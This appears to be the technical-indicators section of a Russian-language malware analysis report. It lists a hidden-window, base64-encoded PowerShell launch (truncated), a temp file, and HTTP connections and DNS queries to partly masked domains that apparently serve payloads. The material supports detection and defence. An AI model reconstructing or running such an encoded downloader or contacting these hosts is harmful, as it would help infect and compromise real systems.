Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAEoAUABXAEsAdQBvAG0APQAnAEEAVABKAEsATwBmAG8AYwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwBVAHIAYABJAGAAVABZAFAAYABSAG8AVABvAGMATwBsACIAIAA9AC...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1568
- %TEMP%\1378440.cvr
- 'li###ub.shop':80
- 'va####tinchap5s.com':80
- http://li###ub.shop/sites/XVwCDK/
- http://www.li###ub.shop/sites/XVwCDK/
- http://va####tinchap5s.com/vayvon5s.com/bUl0gxm408039/
- DNS ASK cr###ior.com
- DNS ASK bi####ucphat.com
- DNS ASK to##o.shop
- DNS ASK li###ub.shop
- DNS ASK va####tinchap5s.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAEoAUABXAEsAdQBvAG0APQAnAEEAVABKAEsATwBmAG8AYwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwBVAHIAYABJAGAAVABZAFAAYABSAG8AVABvAGMATwBsACIAIAA9AC...' (со скрытым окном)